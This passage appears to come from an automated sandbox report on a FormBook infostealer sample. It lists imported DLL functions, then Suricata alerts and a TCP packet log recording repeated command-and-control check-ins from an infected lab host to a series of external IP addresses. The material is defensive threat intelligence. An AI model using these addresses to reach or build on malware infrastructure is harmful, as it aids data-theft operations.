OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T02:44:23.548521+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49962	47.83.1.90	80	TCP
2025-01-11T02:44:23.548521+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49962	47.83.1.90	80	TCP
2025-01-11T02:44:40.151195+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49970	47.83.1.90	80	TCP
2025-01-11T02:44:42.713507+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49971	47.83.1.90	80	TCP
2025-01-11T02:44:45.260400+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49972	47.83.1.90	80	TCP
2025-01-11T02:44:47.853055+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49973	47.83.1.90	80	TCP
2025-01-11T02:44:47.853055+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49973	47.83.1.90	80	TCP
2025-01-11T02:44:53.688889+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49974	185.151.30.223	80	TCP
2025-01-11T02:44:56.259278+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49975	185.151.30.223	80	TCP
2025-01-11T02:44:58.791432+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49976	185.151.30.223	80	TCP
2025-01-11T02:45:01.362219+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49977	185.151.30.223	80	TCP
2025-01-11T02:45:01.362219+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49977	185.151.30.223	80	TCP
2025-01-11T02:45:07.271613+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49978	176.57.65.76	80	TCP
2025-01-11T02:45:09.867232+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49979	176.57.65.76	80	TCP
2025-01-11T02:45:13.135479+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49980	176.57.65.76	80	TCP
2025-01-11T02:45:14.819557+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49981	176.57.65.76	80	TCP
2025-01-11T02:45:14.819557+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49981	176.57.65.76	80	TCP
2025-01-11T02:45:20.438603+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49982	209.74.79.41	80	TCP
2025-01-11T02:45:23.016020+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49983	209.74.79.41	80	TCP
2025-01-11T02:45:25.548020+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49984	209.74.79.41	80	TCP
2025-01-11T02:45:28.111130+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49985	209.74.79.41	80	TCP
2025-01-11T02:45:28.111130+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49985	209.74.79.41	80	TCP
2025-01-11T02:45:34.697877+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49986	46.38.243.234	80	TCP
2025-01-11T02:45:37.245813+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49987	46.38.243.234	80	TCP
2025-01-11T02:45:39.793812+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49988	46.38.243.234	80	TCP
2025-01-11T02:45:44.727153+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49989	46.38.243.234	80	TCP
2025-01-11T02:45:44.727153+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49989	46.38.243.234	80	TCP
2025-01-11T02:45:50.951902+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49990	188.114.97.3	80	TCP
2025-01-11T02:45:53.492508+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49991	188.114.97.3	80	TCP
2025-01-11T02:45:56.021040+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49992	188.114.97.3	80	TCP
2025-01-11T02:45:58.549671+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49993	188.114.97.3	80	TCP
2025-01-11T02:45:58.549671+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49993	188.114.97.3	80	TCP
2025-01-11T02:46:12.654430+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49994	18.163.74.139	80	TCP
2025-01-11T02:46:15.240454+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49995	18.163.74.139	80	TCP
2025-01-11T02:46:17.776170+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49996	18.163.74.139	80	TCP
2025-01-11T02:46:20.315002+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49997	18.163.74.139	80	TCP
2025-01-11T02:46:20.315002+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49997	18.163.74.139	80	TCP
2025-01-11T02:46:26.466968+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49998	162.218.30.235	80	TCP
2025-01-11T02:46:28.950443+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49999	162.218.30.235	80	TCP
2025-01-11T02:46:31.509767+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50000	162.218.30.235	80	TCP
2025-01-11T02:46:34.047558+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	50001	162.218.30.235	80	TCP
2025-01-11T02:46:34.047558+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50001	162.218.30.235	80	TCP
2025-01-11T02:46:40.359327+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50002	192.186.58.31	80	TCP
2025-01-11T02:46:43.496214+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50003	192.186.58.31	80	TCP
2025-01-11T02:46:45.420818+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50004	192.186.58.31	80	TCP
2025-01-11T02:46:48.012886+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	50005	192.186.58.31	80	TCP
2025-01-11T02:46:48.012886+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50005	192.186.58.31	80	TCP
2025-01-11T02:46:54.590259+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50006	47.83.1.90	80	TCP
2025-01-11T02:46:57.303083+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50007	47.83.1.90	80	TCP
2025-01-11T02:46:59.870065+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50008	47.83.1.90	80	TCP
2025-01-11T02:47:02.474715+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	50009	47.83.1.90	80	TCP
2025-01-11T02:47:02.474715+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50009	47.83.1.90	80	TCP
2025-01-11T02:47:08.097693+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50010	104.21.96.1	80	TCP
2025-01-11T02:47:10.626856+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50011	104.21.96.1	80	TCP
2025-01-11T02:47:13.189054+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50012	104.21.96.1	80	TCP
2025-01-11T02:47:15.910143+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	50013	104.21.96.1	80	TCP
2025-01-11T02:47:15.910143+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50013	104.21.96.1	80	TCP
2025-01-11T02:47:21.774804+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50014	75.2.103.23	80	TCP
2025-01-11T02:47:24.331533+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50015	75.2.103.23	80	TCP
2025-01-11T02:47:26.907211+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50016	75.2.103.23	80	TCP
2025-01-11T02:47:29.435642+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	50017	75.2.103.23	80	TCP
2025-01-11T02:47:29.435642+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50017	75.2.103.23	80	TCP
2025-01-11T02:47:35.586649+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50018	134.122.133.80	80	TCP
2025-01-11T02:47:39.502631+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50019	134.122.133.80	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:44:21.950762033 CET	49962	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:21.955724955 CET	80	49962	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:21.955806017 CET	49962	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:22.121277094 CET	49962	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:22.126138926 CET	80	49962	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:23.548336029 CET	80	49962	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:23.548352003 CET	80	49962	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:23.548521042 CET	49962	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:23.551755905 CET	49962	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:23.556565046 CET	80	49962	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:38.616853952 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:38.621762991 CET	80	49970	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:38.621875048 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:38.636176109 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:38.641004086 CET	80	49970	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:40.151195049 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:40.156208992 CET	80	49970	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:40.156342983 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:41.170064926 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:41.174938917 CET	80	49971	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:41.175071001 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:41.198565960 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:41.203493118 CET	80	49971	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:42.713506937 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:42.718621016 CET	80	49971	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:42.718746901 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:43.732333899 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:43.737302065 CET	80	49972	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:43.737449884 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:43.751092911 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:43.755924940 CET	80	49972	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:43.756021976 CET	80	49972	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:45.260400057 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:45.265434027 CET	80	49972	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:45.265539885 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:46.279103041 CET	49973	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:46.284020901 CET	80	49973	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:46.284101963 CET	49973	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:46.293313026 CET	49973	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:46.298172951 CET	80	49973	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:47.852638006 CET	80	49973	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:47.852762938 CET	80	49973	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:47.853055000 CET	49973	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:47.855779886 CET	49973	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:44:47.860635996 CET	80	49973	47.83.1.90	192.168.2.7
Jan 11, 2025 02:44:52.914223909 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:52.919384003 CET	80	49974	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:52.919558048 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:52.936006069 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:52.940937042 CET	80	49974	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:53.688746929 CET	80	49974	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:53.688791990 CET	80	49974	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:53.688889027 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:54.449781895 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:55.472904921 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:55.477813005 CET	80	49975	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:55.479213953 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:55.492682934 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:55.497478962 CET	80	49975	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:56.258914948 CET	80	49975	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:56.259028912 CET	80	49975	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:56.259278059 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:56.997888088 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:58.013662100 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:58.018662930 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:58.018774986 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:58.037822962 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:58.042709112 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:58.042860985 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:58.790909052 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:58.791290998 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 02:44:58.791431904 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:44:59.541667938 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:45:00.570007086 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:45:00.574991941 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 02:45:00.575076103 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:45:00.586613894 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:45:00.591454029 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 02:45:01.361834049 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 02:45:01.361877918 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 02:45:01.362219095 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:45:01.371932030 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 02:45:01.376791000 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 02:45:06.500956059 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:06.505870104 CET	80	49978	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:06.505956888 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:06.520032883 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:06.525099039 CET	80	49978	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:07.271292925 CET	80	49978	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:07.271328926 CET	80	49978	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:07.271612883 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:08.056543112 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:09.060621023 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:09.065656900 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:09.065805912 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:09.085612059 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:09.090435982 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:09.867124081 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:09.867182016 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:09.867216110 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:09.867232084 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:09.867264032 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:10.588498116 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:11.608546019 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:11.613507032 CET	80	49980	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:11.613590956 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:11.629226923 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:11.634011984 CET	80	49980	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:11.634301901 CET	80	49980	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:13.135478973 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:13.140634060 CET	80	49980	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:13.140753984 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:14.154210091 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:14.159271002 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:14.159488916 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:14.168349028 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:14.173201084 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:14.819356918 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:14.819482088 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:14.819556952 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:14.822329998 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 02:45:14.827187061 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 02:45:19.848515987 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:19.853323936 CET	80	49982	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:19.857867956 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:19.877793074 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:19.882729053 CET	80	49982	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:20.438476086 CET	80	49982	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:20.438549042 CET	80	49982	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:20.438602924 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:21.385828018 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:22.405123949 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:22.410051107 CET	80	49983	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:22.410142899 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:22.428251982 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:22.433134079 CET	80	49983	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:23.013930082 CET	80	49983	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:23.014045000 CET	80	49983	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:23.016020060 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:23.932432890 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:24.950989008 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:24.955935001 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:24.957329988 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:24.972147942 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:24.977025032 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:24.977180004 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:25.545022011 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:25.545147896 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:25.548019886 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:26.484532118 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:27.498800039 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:27.503695011 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:27.503782034 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:27.514532089 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:27.519326925 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:28.110846996 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:28.111006021 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:28.111129999 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:28.114006996 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 02:45:28.118829966 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 02:45:33.173911095 CET	49986	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:33.178880930 CET	80	49986	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:33.179016113 CET	49986	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:33.195075989 CET	49986	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:33.199881077 CET	80	49986	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:34.697876930 CET	49986	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:34.744437933 CET	80	49986	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:35.717891932 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:35.722811937 CET	80	49987	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:35.724109888 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:35.739959002 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:35.744822979 CET	80	49987	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:36.642255068 CET	80	49986	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:36.642343044 CET	49986	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:37.245812893 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:37.292356014 CET	80	49987	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:38.265840054 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:38.270773888 CET	80	49988	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:38.270865917 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:38.289623976 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:38.294501066 CET	80	49988	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:38.294693947 CET	80	49988	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:39.189454079 CET	80	49987	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:39.189603090 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:39.793812037 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:39.798892975 CET	80	49988	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:39.799042940 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:40.810580015 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:40.815599918 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:40.815677881 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:40.825345039 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:40.830240011 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:44.726852894 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:44.726922989 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:44.727153063 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:44.729784966 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 02:45:44.734631062 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 02:45:49.768521070 CET	49990	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:49.773410082 CET	80	49990	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:49.773921967 CET	49990	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:49.788472891 CET	49990	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:49.793382883 CET	80	49990	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:50.950886965 CET	80	49990	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:50.950903893 CET	80	49990	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:50.951725006 CET	80	49990	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:50.951901913 CET	49990	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:51.292165041 CET	49990	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:52.312091112 CET	49991	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:52.317498922 CET	80	49991	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:52.317588091 CET	49991	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:52.336381912 CET	49991	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:52.341737986 CET	80	49991	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:53.490735054 CET	80	49991	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:53.490763903 CET	80	49991	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:53.492463112 CET	80	49991	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:53.492479086 CET	80	49991	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:53.492507935 CET	49991	80	192.168.2.7	188.114.97.3
